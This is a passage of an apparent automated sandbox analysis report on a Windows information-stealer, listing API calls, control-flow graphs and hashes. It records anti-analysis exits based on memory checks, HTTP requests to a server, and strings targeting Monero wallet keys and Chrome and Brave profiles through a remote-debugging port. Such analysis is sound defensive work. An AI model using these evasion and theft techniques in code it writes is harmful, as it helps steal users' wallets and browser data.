                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 9fc1921aa5a3fbb3138b344c0ccee01589d8c6c98a87b3bf4a45ea5f1c477c80
                                  • Instruction ID: 6f1d80ce845fae6e297aadbd8c9306c0b783d9194c63466e743fe5513b1a219e
                                  • Opcode Fuzzy Hash: 9fc1921aa5a3fbb3138b344c0ccee01589d8c6c98a87b3bf4a45ea5f1c477c80
                                  • Instruction Fuzzy Hash: DE317071A59108EBCB04FBF8EC5EAFE7379AF04310F404519F112621C1DF786985C662

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1436 701220-701247 call 718b40 GlobalMemoryStatusEx 1439 701273-70127a 1436->1439 1440 701249-701271 call 71dd30 * 2 1436->1440 1442 701281-701285 1439->1442 1440->1442 1444 701287 1442->1444 1445 70129a-70129d 1442->1445 1447 701292-701294 ExitProcess 1444->1447 1448 701289-701290 1444->1448 1448->1445 1448->1447
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0070123E
                                  • __aulldiv.LIBCMT ref: 00701258
                                  • __aulldiv.LIBCMT ref: 00701266
                                  • ExitProcess.KERNEL32 ref: 00701294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: 8b229fab7d81f8bee19570151bdea8943b7742a160d2916dee985f5870279e8f
                                  • Instruction ID: 0a4602b23d5cda440931c75542e342162afb8183be5a7878f4bfe44236e49126
                                  • Opcode Fuzzy Hash: 8b229fab7d81f8bee19570151bdea8943b7742a160d2916dee985f5870279e8f
                                  • Instruction Fuzzy Hash: 3D0162F0E44308FADB10DFD4DC49B9DB7B8BB14705F504549E604B61C0D6B855818B59

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1450 716d93 1451 716daa 1450->1451 1453 716d5a-716d77 call 71ade0 OpenEventA 1451->1453 1454 716dac-716dc2 call 716bc0 call 715d60 CloseHandle ExitProcess 1451->1454 1459 716d95-716da4 CloseHandle Sleep 1453->1459 1460 716d79-716d91 call 71ade0 CreateEventA 1453->1460 1459->1451 1460->1454
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011D9250,?,007210F4,?,00000000,?,007210F8,?,00000000,00720AF3), ref: 00716D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00716D88
                                  • CloseHandle.KERNEL32(00000000), ref: 00716D99
                                  • Sleep.KERNEL32(00001770), ref: 00716DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,011D9250,?,007210F4,?,00000000,?,007210F8,?,00000000,00720AF3), ref: 00716DBA
                                  • ExitProcess.KERNEL32 ref: 00716DC2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 1bacfb7c294475ac47ad773a1a41de5c1faa7bd1f43a7534dc8ca8fc2945ca56
                                  • Instruction ID: 41e3f36a6f5a6ac1e9f1192d32ebed3d4d6166f9c26859ec5b4b628589f6848a
                                  • Opcode Fuzzy Hash: 1bacfb7c294475ac47ad773a1a41de5c1faa7bd1f43a7534dc8ca8fc2945ca56
                                  • Instruction Fuzzy Hash: 2DF05E30B8C219EBEF14ABE4EC0ABFDB374AF14B01F100616B552A51D4DBB855C0DA61

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00704889
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00704899
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: 8b71f2b9479228e7c6d0dfa9fd434db7ddcf3f534c89ec38d0fde2aead3c03f6
                                  • Instruction ID: 7a7220a69004ef130e9c4908e23238d49b3c738d06674854725a280f48eb9486
                                  • Opcode Fuzzy Hash: 8b71f2b9479228e7c6d0dfa9fd434db7ddcf3f534c89ec38d0fde2aead3c03f6
                                  • Instruction Fuzzy Hash: 89215EB1D01208ABDF14DFA4EC4AADE7B75FB04320F108625F915A72D0EB706A09CB81

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 007062D0: InternetOpenA.WININET(00720DFF,00000001,00000000,00000000,00000000), ref: 00706331
                                    • Part of subcall function 007062D0: StrCmpCA.SHLWAPI(?,011DE920), ref: 00706353
                                    • Part of subcall function 007062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00706385
                                    • Part of subcall function 007062D0: HttpOpenRequestA.WININET(00000000,GET,?,011DE3B0,00000000,00000000,00400100,00000000), ref: 007063D5
                                    • Part of subcall function 007062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0070640F
                                    • Part of subcall function 007062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00706421
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00715478
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: de19c2b9b1c2b96b054744568cb79f54790598af1a4dcb8fbd4ab8d0fa1ff5e4
                                  • Instruction ID: 6aabedfc0bb07855cf51235ce73ce8127a7a196745b991e9e2a10ae326532524
                                  • Opcode Fuzzy Hash: de19c2b9b1c2b96b054744568cb79f54790598af1a4dcb8fbd4ab8d0fa1ff5e4
                                  • Instruction Fuzzy Hash: 9C115470A01148EBCB14FFA8EC669EC7339AF50350F404554F91A570D2EF386B84C751
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00717AA0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00717AA7
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00717ABF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: ea1d405090b636e60ab3cc32ee8e3da24a6286099d14b62f158e6c5db972a47e
                                  • Instruction ID: d8d64dbe3642fc3f619f17dce1d43898baaee3ed1da73a1d9056b95043e31950
                                  • Opcode Fuzzy Hash: ea1d405090b636e60ab3cc32ee8e3da24a6286099d14b62f158e6c5db972a47e
                                  • Instruction Fuzzy Hash: A50186B194C259ABC714CF9CDD45BAEFBB8FB04711F10411AF615E22C0D7785A40CBA1
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0070112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00701132
                                  • ExitProcess.KERNEL32 ref: 00701143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 24cf7349c5dd2ae22fc4254b50d3daf19d4c2fddc6026f3453df12220ec2a24e
                                  • Instruction ID: f26000a1c5a6e788cdc2817675c9b4aa95a3fb46a1e500b7c5a1ec84997b3011
                                  • Opcode Fuzzy Hash: 24cf7349c5dd2ae22fc4254b50d3daf19d4c2fddc6026f3453df12220ec2a24e
                                  • Instruction Fuzzy Hash: 19E0E6709DE30CFBE7105BD09D0EB4DB7689B04B15F500155F709761D0D6B525805659
                                  APIs
                                  • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00C493D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID: V
                                  • API String ID: 544645111-1342839628
                                  • Opcode ID: eaa0071282edcbca3fc55d7b39f43fa9c831015e634596b6ebed21bbdfb66e43
                                  • Instruction ID: fa7396b0a6c741024ac515af8ea62334131fefdd52ecf4ddc09b6dcb832ba581
                                  • Opcode Fuzzy Hash: eaa0071282edcbca3fc55d7b39f43fa9c831015e634596b6ebed21bbdfb66e43
                                  • Instruction Fuzzy Hash: CC113872418129DFDF059E64DC406AF37E4EF16310F150119EE82A7991DA336D248BDB
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007010B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007010F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: b3b7bcda0f03f953944e1589f1eb6d4bebd754593ce4bd63dbdd1310c9e57ba9
                                  • Instruction ID: 1f9ea0d1ab4de9e36ed9f16eb030c5dae7b7ee3584b8c2f21affb57f15098c78
                                  • Opcode Fuzzy Hash: b3b7bcda0f03f953944e1589f1eb6d4bebd754593ce4bd63dbdd1310c9e57ba9
                                  • Instruction Fuzzy Hash: 17F0E2B1686208FBE7149AE8AC59FAEB7D8E705B04F700548F540E3280D571AE40DAA0
                                  APIs
                                    • Part of subcall function 00717A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00717AA0
                                    • Part of subcall function 00717A70: RtlAllocateHeap.NTDLL(00000000), ref: 00717AA7
                                    • Part of subcall function 00717A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00717ABF
                                    • Part of subcall function 007179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007011B7), ref: 00717A10
                                    • Part of subcall function 007179E0: RtlAllocateHeap.NTDLL(00000000), ref: 00717A17
                                    • Part of subcall function 007179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00717A2F
                                  • ExitProcess.KERNEL32 ref: 007011C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: a9a9d8e43585d0a6c3f42bd3ac8367e762ac7d5d4dcfb4fc7853a9646854faab
                                  • Instruction ID: 27d18c3d394e353203f64f0d38aa067f1b3cca316a9822e0ba486f680ff45c53
                                  • Opcode Fuzzy Hash: a9a9d8e43585d0a6c3f42bd3ac8367e762ac7d5d4dcfb4fc7853a9646854faab
                                  • Instruction Fuzzy Hash: 0AE0ECB69AC205D2CB1473B9AC0AB5A739C5B1530AF000915F90892182FE29F8809165
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00720B32,00720B2F,00000000,?,?,?,00721450,00720B2E), ref: 0070BEC5
                                  • StrCmpCA.SHLWAPI(?,00721454), ref: 0070BF33
                                  • StrCmpCA.SHLWAPI(?,00721458), ref: 0070BF49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0070C8A9
                                  • FindClose.KERNEL32(000000FF), ref: 0070C8BB
                                  Strings
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 0070C3B2
                                  • Google Chrome, xrefs: 0070C6F8
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 0070C534
                                  • Preferences, xrefs: 0070C104
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 0070C495
                                  • Brave, xrefs: 0070C0E8
                                  • \Brave\Preferences, xrefs: 0070C1C1
                                  Memory Dump Source
